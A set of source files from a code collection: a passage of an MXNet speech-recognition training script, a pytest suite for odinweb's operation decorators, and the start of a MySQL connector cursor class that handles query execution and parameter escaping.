buckets = json.loads(args.config.get('arch', 'buckets'))
data_loaded = BucketSTTIter(partition="train",
count=datagen.count,
datagen=datagen,
batch_size=batch_size,
num_label=max_label_length,
init_states=init_states,
seq_length=max_t_count,
width=whcs.width,
height=whcs.height,
sort_by_duration=sort_by_duration,
is_bi_graphemes=is_bi_graphemes,
buckets=buckets,
save_feature_as_csvfile=save_feature_as_csvfile)
else:
data_loaded = STTIter(partition="train",
count=datagen.count,
datagen=datagen,
batch_size=batch_size,
num_label=max_label_length,
init_states=init_states,
seq_length=max_t_count,
width=whcs.width,
height=whcs.height,
sort_by_duration=sort_by_duration,
is_bi_graphemes=is_bi_graphemes,
save_feature_as_csvfile=save_feature_as_csvfile)
if mode == 'train' or mode == 'load':
if is_bucketing:
validation_loaded = BucketSTTIter(partition="validation",
count=datagen.val_count,
datagen=datagen,
batch_size=batch_size,
num_label=max_label_length,
init_states=init_states,
seq_length=max_t_count,
width=whcs.width,
height=whcs.height,
sort_by_duration=False,
is_bi_graphemes=is_bi_graphemes,
buckets=buckets,
save_feature_as_csvfile=save_feature_as_csvfile)
else:
validation_loaded = STTIter(partition="validation",
count=datagen.val_count,
datagen=datagen,
batch_size=batch_size,
num_label=max_label_length,
init_states=init_states,
seq_length=max_t_count,
width=whcs.width,
height=whcs.height,
sort_by_duration=False,
is_bi_graphemes=is_bi_graphemes,
save_feature_as_csvfile=save_feature_as_csvfile)
return data_loaded, validation_loaded, args
elif mode == 'predict':
return data_loaded, args
def load_model(args, contexts, data_train):
    # load the model built from the model_name prefix and the model_num_epoch
    # epoch, using the given gpu contexts
mode = args.config.get('common', 'mode')
load_optimizer_states = args.config.getboolean('load', 'load_optimizer_states')
is_start_from_batch = args.config.getboolean('load', 'is_start_from_batch')
from importlib import import_module
symbol_template = import_module(args.config.get('arch', 'arch_file'))
is_bucketing = args.config.getboolean('arch', 'is_bucketing')
if mode == 'train':
if is_bucketing:
bucketing_arch = symbol_template.BucketingArch(args)
model_loaded = bucketing_arch.get_sym_gen()
else:
model_loaded = symbol_template.arch(args)
model_num_epoch = None
elif mode == 'load' or mode == 'predict':
model_file = args.config.get('common', 'model_file')
model_name = os.path.splitext(model_file)[0]
model_num_epoch = int(model_name[-4:])
if is_bucketing:
bucketing_arch = symbol_template.BucketingArch(args)
model_loaded = bucketing_arch.get_sym_gen()
else:
model_path = 'checkpoints/' + str(model_name[:-5])
data_names = [x[0] for x in data_train.provide_data]
label_names = [x[0] for x in data_train.provide_label]
model_loaded = mx.module.Module.load(
prefix=model_path, epoch=model_num_epoch, context=contexts,
data_names=data_names, label_names=label_names,
load_optimizer_states=load_optimizer_states)
if is_start_from_batch:
import re
            model_num_epoch = int(re.findall(r'\d+', model_file)[0])
return model_loaded, model_num_epoch
if __name__ == '__main__':
if len(sys.argv) <= 1:
raise Exception('cfg file path must be provided. ' +
                        'e.g. python main.py --configfile examplecfg.cfg')
args = parse_args(sys.argv[1])
# set parameters from cfg file
# give random seed
random_seed = args.config.getint('common', 'random_seed')
mx_random_seed = args.config.getint('common', 'mx_random_seed')
# random seed for shuffling data list
if random_seed != -1:
np.random.seed(random_seed)
# set mx.random.seed to give seed for parameter initialization
if mx_random_seed != -1:
mx.random.seed(mx_random_seed)
else:
mx.random.seed(hash(datetime.now()))
# set log file name
log_filename = args.config.get('common', 'log_filename')
log = LogUtil(filename=log_filename).getlogger()
# set parameters from data section(common)
mode = args.config.get('common', 'mode')
if mode not in ['train', 'predict', 'load']:
raise Exception(
'Define mode in the cfg file first. ' +
'train or predict or load can be the candidate for the mode.')
# get meta file where character to number conversions are defined
contexts = parse_contexts(args)
num_gpu = len(contexts)
batch_size = args.config.getint('common', 'batch_size')
    # check that the number of gpus is a positive divisor of the batch size for data parallelism
    if batch_size % num_gpu != 0:
        raise Exception('num_gpu should be a positive divisor of batch_size')
if mode == "train" or mode == "load":
data_train, data_val, args = load_data(args)
elif mode == "predict":
data_train, args = load_data(args)
is_batchnorm = args.config.getboolean('arch', 'is_batchnorm')
is_bucketing = args.config.getboolean('arch', 'is_bucketing')
# log current config
config_logger = ConfigLogger(log)
config_logger(args.config)
# load model
model_loaded, model_num_epoch = load_model(args, contexts, data_train)
# if mode is 'train', it trains the model
if mode == 'train':
if is_bucketing:
module = STTBucketingModule(
sym_gen=model_loaded,
default_bucket_key=data_train.default_bucket_key,
context=contexts
)
else:
data_names = [x[0] for x in data_train.provide_data]
label_names = [x[0] for x in data_train.provide_label]
module = mx.mod.Module(model_loaded, context=contexts,
data_names=data_names, label_names=label_names)
do_training(args=args, module=module, data_train=data_train, data_val=data_val)
# if mode is 'load', it loads model from the checkpoint and continues the training.
elif mode == 'load':
do_training(args=args, module=model_loaded, data_train=data_train, data_val=data_val,
begin_epoch=model_num_epoch + 1)
# if mode is 'predict', it predict label from the input by the input model
elif mode == 'predict':
# predict through data
if is_bucketing:
max_t_count = args.config.getint('arch', 'max_t_count')
load_optimizer_states = args.config.getboolean('load', 'load_optimizer_states')
model_file = args.config.get('common', 'model_file')
model_name = os.path.splitext(model_file)[0]
model_num_epoch = int(model_name[-4:])
model_path = 'checkpoints/' + str(model_name[:-5])
model = STTBucketingModule(
sym_gen=model_loaded,
default_bucket_key=data_train.default_bucket_key,
context=contexts
)
model.bind(data_shapes=data_train.provide_data,
label_shapes=data_train.provide_label,
for_training=True)
_, arg_params, aux_params = mx.model.load_checkpoint(model_path, model_num_epoch)
model.set_params(arg_params, aux_params)
model_loaded = model
else:
model_loaded.bind(for_training=False, data_shapes=data_train.provide_data,
label_shapes=data_train.provide_label)
max_t_count = args.config.getint('arch', 'max_t_count')
eval_metric = STTMetric(batch_size=batch_size, num_gpu=num_gpu)
if is_batchnorm:
for nbatch, data_batch in enumerate(data_train):
model_loaded.forward(data_batch, is_train=False)
model_loaded.update_metric(eval_metric, data_batch.label)
else:
#model_loaded.score(eval_data=data_train, num_batch=None,
# eval_metric=eval_metric, reset=True)
for nbatch, data_batch in enumerate(data_train):
model_loaded.forward(data_batch, is_train=False)
model_loaded.update_metric(eval_metric, data_batch.label)
else:
raise Exception(
'Define mode in the cfg file first. ' +
'train or predict or load can be the candidate for the mode')
|
{
"content_hash": "60f91a953c398af6341a7a38639ad523",
"timestamp": "",
"source": "github",
"line_count": 352,
"max_line_length": 121,
"avg_line_length": 47.80397727272727,
"alnum_prop": 0.5751470850418969,
"repo_name": "lxn2/mxnet",
"id": "a425e0a8ab409bd9a17537f5e083a5fbe883a0c9",
"size": "16827",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "example/speech_recognition/main.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "10619"
},
{
"name": "C",
"bytes": "89393"
},
{
"name": "C++",
"bytes": "3189126"
},
{
"name": "CMake",
"bytes": "48546"
},
{
"name": "Cuda",
"bytes": "566898"
},
{
"name": "Groovy",
"bytes": "217"
},
{
"name": "Java",
"bytes": "16368"
},
{
"name": "Jupyter Notebook",
"bytes": "1229390"
},
{
"name": "Makefile",
"bytes": "40032"
},
{
"name": "Matlab",
"bytes": "30187"
},
{
"name": "Perl",
"bytes": "615878"
},
{
"name": "Perl6",
"bytes": "21993"
},
{
"name": "Protocol Buffer",
"bytes": "77256"
},
{
"name": "Python",
"bytes": "3084885"
},
{
"name": "R",
"bytes": "280777"
},
{
"name": "Scala",
"bytes": "855146"
},
{
"name": "Shell",
"bytes": "109919"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
import pytest
from collections import defaultdict
from odin.exceptions import ValidationError
from odinweb import decorators
from odinweb.constants import *
from odinweb.data_structures import NoPath, Param, HttpResponse
from odinweb.exceptions import HttpError
from odinweb.testing import MockRequest
from .resources import User
class TestOperation(object):
def test_init(self):
@decorators.Operation
def target(request):
"""
Test target
"""
assert isinstance(target, decorators.Operation)
assert target.url_path == NoPath
assert target.methods == (Method.GET,)
def test_str(self):
@decorators.Operation(path="test/{id}/start")
def target(request):
"""
Test target
"""
assert "tests.test_decorators.target - GET test/{id:Integer}/start" == str(target)
def test_repr(self):
@decorators.Operation(path="test/{id}/start")
def target(request):
"""
Test target
"""
assert "Operation('tests.test_decorators.target', " \
"UrlPath('test', PathParam(name='id', type=<Type.Integer: 'integer:int32'>, type_args=None), 'start'), " \
"(<Method.GET: 'GET'>,))" == repr(target)
def test_unbound(self):
@decorators.Operation(tags=('eek', 'bar'))
def target(request):
"""
Test target
"""
return 'foo'
request = MockRequest()
assert target.resource is None
assert not target.is_bound
assert target.tags == {'eek', 'bar'}
actual = target(request, {})
assert actual == 'foo'
def test_bind_to_instance(self):
@decorators.Operation(tags=('eek', 'bar'))
def target(binding, request):
"""
Test target
"""
assert binding == api
return 'foo'
class MockApi(object):
def __init__(self):
self.call_count = defaultdict(int)
self.resource = User
self.tags = {'bar'}
def pre_dispatch(self, request, path_args):
self.call_count['pre_dispatch'] += 1
def post_dispatch(self, request, response):
self.call_count['post_dispatch'] += 1
return response
api = MockApi()
request = MockRequest()
target.bind_to_instance(api)
assert target.binding == api
assert target.resource is User
assert target.is_bound
assert target.tags == {'eek', 'bar'}
actual = target(request, {})
assert actual == 'foo'
assert api.call_count == {'pre_dispatch': 1, 'post_dispatch': 1}
@pytest.mark.parametrize('decorator, init_args, expected', (
(decorators.Operation, {}, {}),
(decorators.Operation, {'tags': 'foo'}, {'tags': ['foo']}),
))
def test_to_swagger(self, decorator, init_args, expected):
@decorator(**init_args)
def my_func(request):
"""
My Func
"""
pass
# Set some common defaults
expected.setdefault('operationId', 'tests.test_decorators.my_func')
expected.setdefault('description', 'My Func')
expected.setdefault('responses', {'default': {
'description': 'Unhandled error',
'schema': {'$ref': '#/definitions/Error'}
}})
actual = my_func.to_swagger()
assert actual == expected
class TestWrappedListOperation(object):
@pytest.mark.parametrize('options, offset, limit', (
({}, 0, 50),
({'default_limit': 10}, 0, 10),
))
def test_documentation_applied(self, options, offset, limit):
@decorators.listing(**options)
def my_func(request):
pass
assert my_func.default_offset == offset
assert my_func.default_limit == limit
@pytest.mark.parametrize('options, query, offset, limit, bare', (
({}, {}, 0, 50, False),
({}, {'offset': 10}, 10, 50, False),
({}, {'limit': 20}, 0, 20, False),
({}, {'bare': 'F'}, 0, 50, False),
({}, {'bare': 'T'}, 0, 50, True),
({}, {'bare': 'yes'}, 0, 50, True),
({}, {'offset': 10, 'limit': 20, 'bare': '1'}, 10, 20, True),
# Max limit
({'max_limit': 100}, {}, 0, 50, False),
({'max_limit': 100}, {'offset': 10, 'limit': 100}, 10, 100, False),
({'max_limit': 100}, {'offset': 10, 'limit': 102}, 10, 100, False),
# Silly values?
({}, {'offset': -1}, 0, 50, False),
({}, {'limit': -1}, 0, 1, False),
({}, {'limit': 0}, 0, 1, False),
({}, {'offset': -1, 'limit': -1}, 0, 1, False),
))
def test_options_handled(self, options, query, offset, limit, bare):
mock_request = MockRequest(query=query)
@decorators.WrappedListOperation(**options)
def my_func(request, **kwargs):
assert request is mock_request
assert kwargs['offset'] == offset
assert kwargs['limit'] == limit
assert kwargs['foo'] == 'bar'
return [1, 2, 3]
result = my_func(mock_request, {'foo': 'bar'})
if bare:
assert result == [1, 2, 3]
else:
assert isinstance(result, decorators.Listing)
assert result.results == [1, 2, 3]
assert result.offset == offset
assert result.limit == limit
assert result.total_count is None
def test_returning_total_count(self):
mock_request = MockRequest()
@decorators.WrappedListOperation
def my_func(request, foo, offset, limit):
assert foo == 'bar'
assert offset == 0
assert limit == 50
return [1, 2, 3], 5
result = my_func(mock_request, {'foo': 'bar'})
assert isinstance(result, decorators.Listing)
assert result.results == [1, 2, 3]
assert result.offset == 0
assert result.limit == 50
assert result.total_count == 5
class TestListOperation(object):
@pytest.mark.parametrize('options, offset, limit', (
({}, 0, 50),
({'default_limit': 10}, 0, 10),
))
def test_documentation_applied(self, options, offset, limit):
options.setdefault('use_wrapper', False)
@decorators.listing(**options)
def my_func(request):
pass
assert my_func.default_offset == offset
assert my_func.default_limit == limit
@pytest.mark.parametrize('options, query, offset, limit', (
({}, {}, 0, 50),
({}, {'offset': 10}, 10, 50),
({}, {'limit': 20}, 0, 20),
({}, {'offset': 10, 'limit': 20}, 10, 20),
# Max limit
({'max_limit': 100}, {}, 0, 50),
({'max_limit': 100}, {'offset': 10, 'limit': 100}, 10, 100),
))
def test_options_handled(self, options, query, offset, limit):
mock_request = MockRequest(query=query)
@decorators.ListOperation(**options)
def my_func(request, **kwargs):
assert request is mock_request
assert kwargs['offset'] == offset
assert kwargs['limit'] == limit
assert kwargs['foo'] == 'bar'
return [1, 2, 3]
result = my_func(mock_request, {'foo': 'bar'})
assert isinstance(result, HttpResponse)
assert result.body == '[1, 2, 3]'
assert result['X-Page-Offset'] == str(offset)
assert result['X-Page-Limit'] == str(limit)
assert 'X-Total-Count' not in result.headers
@pytest.mark.parametrize('options, query, expected_errors', (
({}, {'offset': ''}, 1),
({}, {'offset': 'abc'}, 1),
({}, {'offset': 'xyz'}, 1),
({}, {'limit': ''}, 1),
({}, {'limit': 'abc'}, 1),
({}, {'limit': 'xyz'}, 1),
({}, {'limit': '', 'offset': ''}, 2),
# Outside limits
({}, {'offset': '-1'}, 1),
({}, {'limit': '-1'}, 1),
({'max_limit': 60}, {'limit': '61'}, 1),
))
def test_bad_values(self, options, query, expected_errors):
mock_request = MockRequest(query=query)
@decorators.ListOperation(**options)
def my_func(request, **kwargs):
return [1, 2, 3]
with pytest.raises(ValidationError) as error:
my_func(mock_request, {'foo': 'bar'})
assert len(error.value.error_messages) == expected_errors
def test_returning_total_count(self):
mock_request = MockRequest()
@decorators.ListOperation
def my_func(request, foo, offset, limit):
assert foo == 'bar'
assert offset == 0
assert limit == 50
return [1, 2, 3], 5
result = my_func(mock_request, {'foo': 'bar'})
assert isinstance(result, HttpResponse)
assert result.body == '[1, 2, 3]'
assert result['X-Page-Offset'] == '0'
assert result['X-Page-Limit'] == '50'
assert result['X-Total-Count'] == '5'
class TestResourceOperation(object):
def test_documentation_applied(self):
@decorators.ResourceOperation(resource=User)
def my_func(request, user):
pass
assert Param.body() in my_func.parameters
def test_execute(self):
@decorators.ResourceOperation(resource=User)
def my_func(request, user):
assert isinstance(user, User)
assert user.name == "Stephen"
request = MockRequest(body='{"id": 1, "name": "Stephen"}')
my_func(request, {})
def test_execute__invalid(self):
@decorators.ResourceOperation(resource=User)
def my_func(request, user):
assert isinstance(user, User)
assert user.name == "Stephen"
request = MockRequest(body='{"id": 1, "name": "Stephen"')
with pytest.raises(HttpError):
my_func(request, {})
@pytest.mark.parametrize('decorator, klass, method', (
(decorators.listing, decorators.WrappedListOperation, Method.GET),
(decorators.create, decorators.ResourceOperation, Method.POST),
(decorators.detail, decorators.Operation, Method.GET),
(decorators.update, decorators.ResourceOperation, Method.PUT),
(decorators.patch, decorators.ResourceOperation, Method.PATCH),
(decorators.delete, decorators.Operation, Method.DELETE),
))
def test_endpoint_decorators(decorator, klass, method):
@decorator
def target(request):
pass
assert isinstance(target, klass)
assert target.methods == (method,)
class TestSecurity(object):
"""
Test the security definition
"""
def test_permissions(self):
@decorators.security('user', 'write:user', 'read:user')
def target(request):
pass
assert hasattr(target, 'security')
assert isinstance(target.security, decorators.Security)
assert target.security.name == 'user'
assert target.security.permissions == {'write:user', 'read:user'}
def test_to_swagger(self):
@decorators.security('user', 'write:user', 'read:user')
def target(request):
pass
actual = target.security.to_swagger()
assert isinstance(actual, dict)
assert len(actual) == 1
assert 'user' in actual
assert len(actual['user']) == 2
assert {'write:user', 'read:user'} == set(actual['user'])
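# These tests exercise the Operation decorator classes directly; with the repo's
# dev dependencies installed they can be run via, e.g., `pytest tests/test_decorators.py`.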
|
{
"content_hash": "4de96fff00c46e73ddaad10c87632e51",
"timestamp": "",
"source": "github",
"line_count": 352,
"max_line_length": 121,
"avg_line_length": 32.76704545454545,
"alnum_prop": 0.5515866134905497,
"repo_name": "python-odin/odinweb",
"id": "0805657ffaf3c7b8721ae020d27ef4a706e15a56",
"size": "11534",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "tests/test_decorators.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "3186"
},
{
"name": "Python",
"bytes": "199028"
}
],
"symlink_target": ""
}
|
"""Cursor classes
"""
import weakref
import re
from . import errors
RE_SQL_COMMENT = re.compile(r"/\*.*\*/")
RE_SQL_INSERT_VALUES = re.compile(
r'VALUES\s*(\(\s*(?:%(?:\(.*\)|)s\s*(?:,|)\s*)+\))',
re.I | re.M)
RE_SQL_INSERT_STMT = re.compile(r'INSERT\s+INTO', re.I)
RE_PY_PARAM = re.compile(b'(%s)')
RE_SQL_SPLIT_STMTS = re.compile(
b''';(?=(?:[^"'`]*["'`][^"'`]*["'`])*[^"'`]*$)''')
class _ParamSubstitutor(object):
def __init__(self, params):
self.params = params
self.index = 0
def __call__(self, matchobj):
index = self.index
self.index += 1
try:
return self.params[index]
except IndexError:
raise errors.ProgrammingError(
"Not enough parameters for the SQL statement")
@property
def remaining(self):
return len(self.params) - self.index
class CursorBase(object):
"""
Base for defining MySQLCursor. This class is a skeleton and defines
methods and members as required for the Python Database API
Specification v2.0.
    It's better to inherit from MySQLCursor.
"""
def __init__(self):
self._description = None
self._rowcount = -1
self._last_insert_id = None
self.arraysize = 1
def __del__(self):
self.close()
def callproc(self, procname, args=()):
pass
def close(self):
pass
def execute(self, operation, params=()):
pass
def executemany(self, operation, seqparams):
pass
def fetchone(self):
pass
def fetchmany(self, size=1):
pass
def fetchall(self):
pass
def nextset(self):
pass
def setinputsizes(self, sizes):
pass
def setoutputsize(self, size, column=None):
pass
def reset(self):
pass
@property
def description(self):
"""Returns description of columns in a result
        This property returns a list of tuples describing the columns
        in a result set. A tuple is described as follows::
(column_name,
type,
None,
None,
None,
None,
null_ok,
column_flags) # Addition to PEP-249 specs
Returns a list of tuples.
"""
return self._description
@property
def rowcount(self):
"""Returns the number of rows produced or affected
This property returns the number of rows produced by queries
such as a SELECT, or affected rows when executing DML statements
like INSERT or UPDATE.
Note that for non-buffered cursors it is impossible to know the
number of rows produced before having fetched them all. For those,
the number of rows will be -1 right after execution, and
incremented when fetching rows.
Returns an integer.
"""
return self._rowcount
@property
def lastrowid(self):
"""Returns the value generated for an AUTO_INCREMENT column
Returns the value generated for an AUTO_INCREMENT column by
the previous INSERT or UPDATE statement or None when there is
no such value available.
Returns a long value or None.
"""
return self._last_insert_id
class MySQLCursor(CursorBase):
"""Default cursor for interacting with MySQL
This cursor will execute statements and handle the result. It will
not automatically fetch all rows.
    MySQLCursor should be inherited whenever other functionality is
    required. An example would be to change the fetch* member functions
to return dictionaries instead of lists of values.
Implements the Python Database API Specification v2.0 (PEP-249)
"""
def __init__(self, connection=None):
CursorBase.__init__(self)
self._connection = None
self._stored_results = []
self._nextrow = (None, None)
self._warnings = None
self._warning_count = 0
self._executed = None
self._executed_list = []
if connection is not None:
self._set_connection(connection)
def __iter__(self):
"""
Iteration over the result set which calls self.fetchone()
and returns the next row.
"""
return iter(self.fetchone, None)
def _set_connection(self, connection):
try:
self._connection = weakref.proxy(connection)
self._connection._protocol
except (AttributeError, TypeError):
raise errors.InterfaceError(errno=2048)
def _reset_result(self):
self._rowcount = -1
self._nextrow = (None, None)
self._stored_results = []
self._warnings = None
self._warning_count = 0
self._description = None
self._executed = None
self._executed_list = []
self.reset()
def _have_unread_result(self):
"""Check whether there is an unread result"""
try:
return self._connection.unread_result
except AttributeError:
return False
def next(self):
        return self.__next__()
def __next__(self):
"""
        Used for iterating over the result set. Calls self.fetchone()
to get the next row.
"""
try:
row = self.fetchone()
except errors.InterfaceError:
raise StopIteration
if not row:
raise StopIteration
return row
def close(self):
"""Close the cursor
Returns True when successful, otherwise False.
"""
if self._connection is None:
return False
self._reset_result()
self._connection = None
return True
def _process_params_dict(self, params):
try:
to_mysql = self._connection.converter.to_mysql
escape = self._connection.converter.escape
quote = self._connection.converter.quote
res = {}
for k,v in list(params.items()):
c = v
c = to_mysql(c)
c = escape(c)
c = quote(c)
res["%({})s".format(k).encode()] = c
except Exception as e:
raise errors.ProgrammingError(
"Failed processing pyformat-parameters; %s" % e)
else:
return res
def _process_params(self, params):
"""
Process the parameters which were given when self.execute() was
called. It does following using the MySQLConnection converter:
* Convert Python types to MySQL types
* Escapes characters required for MySQL.
* Quote values when needed.
Returns a list.
"""
try:
res = params
to_mysql = self._connection.converter.to_mysql
escape = self._connection.converter.escape
quote = self._connection.converter.quote
res = list(map(to_mysql,res))
res = list(map(escape,res))
res = list(map(quote,res))
except Exception as e:
raise errors.ProgrammingError(
"Failed processing format-parameters; %s" % e)
else:
return tuple(res)
def _row_to_python(self, rowdata, desc=None):
res = ()
try:
if not desc:
desc = self.description
for idx,v in enumerate(rowdata):
flddsc = desc[idx]
res += (self._connection.converter.to_python(flddsc, v),)
except Exception as e:
raise errors.InterfaceError(
"Failed converting row to Python types; %s" % e)
else:
return res
def _handle_noresultset(self, res):
"""Handles result of execute() when there is no result set
"""
try:
self._rowcount = res['affected_rows']
self._last_insert_id = res['insert_id']
self._warning_count = res['warning_count']
except (KeyError, TypeError) as err:
raise errors.ProgrammingError(
"Failed handling non-resultset; {}".format(err))
if self._connection.get_warnings is True and self._warning_count:
self._warnings = self._fetch_warnings()
def _handle_resultset(self):
pass
def _handle_result(self, result):
"""
        Handle the result after a command was sent. The result can be either
an OK-packet or a dictionary containing column/eof information.
Raises InterfaceError when result is not a dict() or result is
invalid.
"""
if not isinstance(result, dict):
raise errors.InterfaceError('Result was not a dict()')
if 'columns' in result:
# Weak test, must be column/eof information
self._description = result['columns']
self._connection.unread_result = True
self._handle_resultset()
elif 'affected_rows' in result:
# Weak test, must be an OK-packet
self._connection.unread_result = False
self._handle_noresultset(result)
else:
raise errors.InterfaceError('Invalid result')
def _execute_iter(self, query_iter):
"""Generator returns MySQLCursor objects for multiple statements
This method is only used when multiple statements are executed
by the execute() method. It uses zip() to make an iterator from the
given query_iter (result of MySQLConnection.cmd_query_iter()) and
the list of statements that were executed.
"""
if not self._executed_list:
self._executed_list = RE_SQL_SPLIT_STMTS.split(self._executed)
for result, stmt in zip(query_iter, iter(self._executed_list)):
self._reset_result()
self._handle_result(result)
self._executed = stmt
yield self
def execute(self, operation, params=None, multi=False):
"""Executes the given operation
Executes the given operation substituting any markers with
the given parameters.
For example, getting all rows where id is 5:
cursor.execute("SELECT * FROM t1 WHERE id = %s", (5,))
The multi argument should be set to True when executing multiple
statements in one operation. If not set and multiple results are
found, an InterfaceError will be raised.
        If warnings were generated, and connection.get_warnings is True, then
self._warnings will be a list containing these warnings.
Returns an iterator when multi is True, otherwise None.
"""
if not operation:
return
if self._connection.unread_result is True:
raise errors.InternalError("Unread result found.")
self._reset_result()
stmt = ''
try:
if not isinstance(operation, bytes):
stmt = operation.encode(self._connection.charset)
else:
stmt = operation
except (UnicodeDecodeError, UnicodeEncodeError) as e:
raise errors.ProgrammingError(str(e))
if params is not None:
if isinstance(params, dict):
for k,v in self._process_params_dict(params).items():
stmt = stmt.replace(k, v, 1)
elif isinstance(params, (list, tuple)):
psub = _ParamSubstitutor(self._process_params(params))
stmt = RE_PY_PARAM.sub(psub, stmt)
if psub.remaining != 0:
raise errors.ProgrammingError(
"Not all parameters were used in the SQL statement")
if multi:
self._executed = stmt
self._executed_list = []
return self._execute_iter(self._connection.cmd_query_iter(stmt))
else:
self._executed = stmt
try:
self._handle_result(self._connection.cmd_query(stmt))
except errors.InterfaceError as err:
if self._connection._have_next_result:
raise errors.InterfaceError(
"Use multi=True when executing multiple statements")
raise
return None
def _batch_insert(self, operation, seq_params):
opnocom = re.sub(RE_SQL_COMMENT,'',operation)
m = re.search(RE_SQL_INSERT_VALUES,opnocom)
fmt = m.group(1).encode(self._connection.charset)
values = []
try:
stmt = operation.encode(self._connection.charset)
for params in seq_params:
tmp = fmt
if isinstance(params,dict):
for k,v in self._process_params_dict(params).items():
tmp = tmp.replace(k,v,1)
else:
psub = _ParamSubstitutor(self._process_params(params))
tmp = RE_PY_PARAM.sub(psub,tmp)
if psub.remaining != 0:
raise errors.ProgrammingError("Not all parameters "
"were used in the SQL statement")
#for p in self._process_params(params):
# tmp = tmp.replace(b'%s',p,1)
values.append(tmp)
stmt = stmt.replace(fmt,b','.join(values),1)
return self.execute(stmt)
except (UnicodeDecodeError,UnicodeEncodeError) as e:
raise errors.ProgrammingError(str(e))
except errors.Error:
raise
except Exception as e:
raise errors.InterfaceError(
"Failed executing the operation; %s" % e)
def executemany(self, operation, seq_params):
"""Execute the given operation multiple times
The executemany() method will execute the operation iterating
over the list of parameters in seq_params.
Example: Inserting 3 new employees and their phone number
data = [
('Jane','555-001'),
('Joe', '555-001'),
('John', '555-003')
]
stmt = "INSERT INTO employees (name, phone) VALUES ('%s','%s)"
cursor.executemany(stmt, data)
INSERT statements are optimized by batching the data, that is
using the MySQL multiple rows syntax.
Results are discarded. If they are needed, consider looping over
data using the execute() method.
"""
if not operation:
return
if self._connection.unread_result is True:
raise errors.InternalError("Unread result found.")
if not isinstance(seq_params, (list,tuple)):
raise errors.ProgrammingError(
"Parameters for query must be list or tuple.")
# Optimize INSERTs by batching them
if re.match(RE_SQL_INSERT_STMT,operation):
return self._batch_insert(operation,seq_params)
rowcnt = 0
try:
for params in seq_params:
self.execute(operation, params)
if self.with_rows and self._have_unread_result():
self.fetchall()
rowcnt += self._rowcount
except (ValueError, TypeError) as err:
raise errors.InterfaceError(
"Failed executing the operation; {}".format(err))
except:
# Raise whatever execute() raises
raise
self._rowcount = rowcnt
def stored_results(self):
"""Returns an iterator for stored results
This method returns an iterator over results which are stored when
callproc() is called. The iterator will provide MySQLCursorBuffered
instances.
Returns a iterator.
"""
return iter(self._stored_results)
def callproc(self, procname, args=()):
"""Calls a stored procedue with the given arguments
The arguments will be set during this session, meaning
they will be called like _<procname>__arg<nr> where
<nr> is an enumeration (+1) of the arguments.
Coding Example:
1) Definining the Stored Routine in MySQL:
CREATE PROCEDURE multiply(IN pFac1 INT, IN pFac2 INT, OUT pProd INT)
BEGIN
SET pProd := pFac1 * pFac2;
END
2) Executing in Python:
args = (5,5,0) # 0 is to hold pprod
cursor.callproc('multiply', args)
print cursor.fetchone()
Does not return a value, but a result set will be
available when the CALL-statement execute successfully.
Raises exceptions when something is wrong.
"""
if not procname or not isinstance(procname, str):
raise ValueError("procname must be a string")
if not isinstance(args, (tuple, list)):
raise ValueError("args must be a sequence")
argfmt = "@_%s_arg%d"
self._stored_results = []
results = []
try:
argnames = []
if args:
for idx,arg in enumerate(args):
argname = argfmt % (procname, idx+1)
argnames.append(argname)
self.execute("SET {0}=%s".format(argname), (arg,))
call = "CALL %s(%s)" % (procname,','.join(argnames))
for result in self._connection.cmd_query_iter(call):
if 'columns' in result:
tmp = MySQLCursorBuffered(self._connection._get_self())
tmp._handle_result(result)
results.append(tmp)
if argnames:
select = "SELECT %s" % ','.join(argnames)
self.execute(select)
self._stored_results = results
return self.fetchone()
else:
self._stored_results = results
return ()
except errors.Error:
raise
except Exception as e:
raise errors.InterfaceError(
"Failed calling stored routine; %s" % e)
def getlastrowid(self):
"""Returns the value generated for an AUTO_INCREMENT column
Returns the value generated for an AUTO_INCREMENT column by
the previous INSERT or UPDATE statement.
Returns a long value or None.
"""
return self._last_insert_id
def _fetch_warnings(self):
"""
Fetch warnings doing a SHOW WARNINGS. Can be called after getting
the result.
Returns a result set or None when there were no warnings.
"""
res = []
try:
c = self._connection.cursor()
            c.execute("SHOW WARNINGS")
res = c.fetchall()
c.close()
except Exception as e:
raise errors.InterfaceError(
"Failed getting warnings; %s" % e)
if self._connection.raise_on_warnings is True:
            raise errors.get_mysql_exception(res[0][1], res[0][2])
else:
if len(res):
return res
return None
def _handle_eof(self, eof):
self._connection.unread_result = False
self._nextrow = (None, None)
self._warning_count = eof['warning_count']
if self._connection.get_warnings is True and eof['warning_count']:
self._warnings = self._fetch_warnings()
def _fetch_row(self):
if self._have_unread_result() is False:
return None
row = None
try:
if self._nextrow == (None, None):
(row, eof) = self._connection.get_row()
else:
(row, eof) = self._nextrow
if row:
(foo, eof) = self._nextrow = self._connection.get_row()
if eof is not None:
self._handle_eof(eof)
if self._rowcount == -1:
self._rowcount = 1
else:
self._rowcount += 1
if eof:
self._handle_eof(eof)
except:
raise
else:
return row
def fetchwarnings(self):
return self._warnings
def fetchone(self):
row = self._fetch_row()
if row:
return self._row_to_python(row)
return None
def fetchmany(self,size=None):
res = []
cnt = (size or self.arraysize)
while cnt > 0 and self._have_unread_result():
cnt -= 1
row = self.fetchone()
if row:
res.append(row)
return res
def fetchall(self):
if not self._have_unread_result():
raise errors.InterfaceError("No result set to fetch from.")
res = []
(rows, eof) = self._connection.get_rows()
self._rowcount = len(rows)
for i in range(0, self._rowcount):
res.append(self._row_to_python(rows[i]))
self._handle_eof(eof)
return res
@property
def column_names(self):
"""Returns column names
This property returns the columns names as a tuple.
Returns a tuple.
"""
if not self.description:
return ()
return tuple( [d[0] for d in self.description] )
@property
def statement(self):
"""Returns the executed statement
This property returns the executed statement. When multiple
statements were executed, the current statement in the iterator
will be returned.
"""
try:
return self._executed.strip().decode('utf8')
except AttributeError:
return self._executed.strip()
@property
def with_rows(self):
"""Returns whether the cursor could have rows returned
This property returns True when column descriptions are available
and possibly also rows, which will need to be fetched.
Returns True or False.
"""
if not self.description:
return False
return True
def __str__(self):
fmt = "MySQLCursor: %s"
if self._executed:
executed = self._executed.decode('utf-8')
if len(executed) > 30:
res = fmt % (executed[:30] + '..')
else:
res = fmt % (executed)
else:
res = fmt % '(Nothing executed yet)'
return res
class MySQLCursorBuffered(MySQLCursor):
"""Cursor which fetches rows within execute()"""
def __init__(self, connection=None):
